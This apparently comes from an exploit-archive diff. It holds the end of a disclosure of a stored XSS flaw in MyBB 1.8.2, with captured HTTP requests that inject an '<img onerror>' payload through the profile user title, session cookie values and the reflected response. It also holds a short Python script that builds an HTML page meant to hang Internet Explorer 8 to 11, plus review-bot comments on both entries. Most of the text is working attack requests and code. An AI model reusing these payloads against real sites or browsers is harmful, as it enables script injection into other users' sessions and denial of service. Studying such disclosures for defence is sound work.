*User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101
Firefox/33.0*
*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8*
*Accept-Language: en-US,en;q=0.5*
*Accept-Encoding: gzip, deflate*
*Referer: http://localhost/fuck/Upload/usercp.php?action=profile
<http://localhost/fuck/Upload/usercp.php?action=profile>*
*Cookie: adminsid=d926efdecaa86cdba516a78abef57b47; acploginattempts=0;
mybb[lastvisit]=1416124581; mybb[lastactive]=1416126977; mybb[referrer]=1;
loginattempts=1; sid=c1ec3cf334b129e0f7e58f9ca9971aeb;
mybbuser=2_FWzmPOn8tKQhMm2urQwtHHx3iAJDWoB5kbyjjB2xwmbTXPpeAx*
*Connection: keep-alive*
*Content-Type: application/x-www-form-urlencoded*
*Content-Length: 382*
*my_post_key=6fa6202df4adac5d50bd19b0c1204992&bday1=&bday2=&bday3=&birthdayprivacy=all&website=http%3A%2F%2F&profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&profile_fields%5Bfid3%5D=Undisclosed&usertitle=%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3B%3E&icq=&aim=&yahoo=&skype=&google=&away=0&awayreason=&awayday=&awaymonth=&awayyear=&action=do_profile®submit=Update+Profile*
*Step 2: Go to http://localhost/fuck/upload/calendar.php
<http://localhost/fuck/upload/calendar.php>*
*Step 3: Create any event on any date and click on event.*
*REQUEST*
*GET /fuck/Upload/calendar.php?action=event&eid=9 HTTP/1.1*
*Host: localhost*
*User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101
Firefox/33.0*
*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8*
*Accept-Language: en-US,en;q=0.5*
*Accept-Encoding: gzip, deflate*
*Referer: http://localhost/fuck/Upload/calendar.php
<http://localhost/fuck/Upload/calendar.php>*
*Cookie: adminsid=d926efdecaa86cdba516a78abef57b47; acploginattempts=0;
mybb[lastvisit]=1416124581; mybb[lastactive]=1416126977; mybb[referrer]=1;
loginattempts=1; sid=c1ec3cf334b129e0f7e58f9ca9971aeb;
mybbuser=2_FWzmPOn8tKQhMm2urQwtHHx3iAJDWoB5kbyjjB2xwmbTXPpeAx*
*Connection: keep-alive*
*RESPONSE:*
HTTP/1.1 200 OK
Date: Sun, 16 Nov 2014 09:37:46 GMT
Server: Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.5.15
X-Powered-By: PHP/5.5.15
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 11336
[SNIP]
<strong><span class="largetext"><a href="
http://localhost/fuck/Upload/member.php?action=profile&uid=3">avinash</a></span></strong><br
/>
<span class="smalltext">
<img src=x onerror=alert('XSS');><br />
<img src="images/star.png" border="0" alt="*" /><img src="images/star.png"
border="0" alt="*" /><img src="images/star.png" border="0" alt="*" /><img
src="images/star.png" border="0" alt="*" /><img src="images/star.png"
border="0" alt="*" /><br />
</span>
</div>
<div class="float_right" style="text-align: right;">
[snip]
Only XSS response is shown here :) not complete response to avoid junk :)
*Recommendation: *Upgrade MyBB 1.8.2 :)
*By:*
*Avinash Kumar Thapa a.k.a "-Acid" or "SPID3R"*
*Twitter: * https://twitter.com/m_avinash143
Facebook:https://www.facebook.com/M.avinash143
That's all for the day
Enjoy
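Review bot: The closing line `*Recommendation: *Upgrade MyBB 1.8.2 :)` names the very version the advisory reports as vulnerable (`Version: MyBB 1.8.2 (latest)`), so a reader is given no actionable fix; the entry should either cite a fixed release or state that no patch was available at publication. The captured requests also include live `sid`, `adminsid` and `mybbuser` cookie values from the test instance; they add nothing to the proof and are normally redacted to `[snip]` like the response body.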

17
platforms/windows/dos/35202.py Executable file

@ -0,0 +1,17 @@
# Exploit Title: [ IE D.O.S ]
# Date: [10/28/2014]
# Exploit Author: [Behrooz Abbassi]
# Vendor Homepage: [http://microsoft.com]
# Software Link: [http://windows.microsoft.com/en-us/internet-explorer/download-ie]
# Version: [tested on 8 to 11]
# Tested on: [XP to 8.1 x64/x86]
FuckIE="""<!DOCTYPE html>\n<html>\n<head><title>IE D.O.S</title>\n</head>\n<body>\n %s </body>\n</html>\n"""
rubbish = """ <div class="First"><div class="Two"/> :-)<div class="Three"> </div>\n""" * 1021
IE_DOS =FuckIE %rubbish
file = open("IE_DOS.html", "w")
file.write(IE_DOS)
file.close()
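Review bot: `file = open("IE_DOS.html", "w")` shadows the `file` builtin and leaves the handle open if `write` raises; `with open("IE_DOS.html", "w") as out:` followed by `out.write(IE_DOS)` replaces the three lines and closes the file on every path. The header gives no rationale for the `* 1021` repetition count; a short comment stating how that number was arrived at (e.g. smallest count that reproduced the hang in testing, if that is the case) would help anyone re-validating the entry.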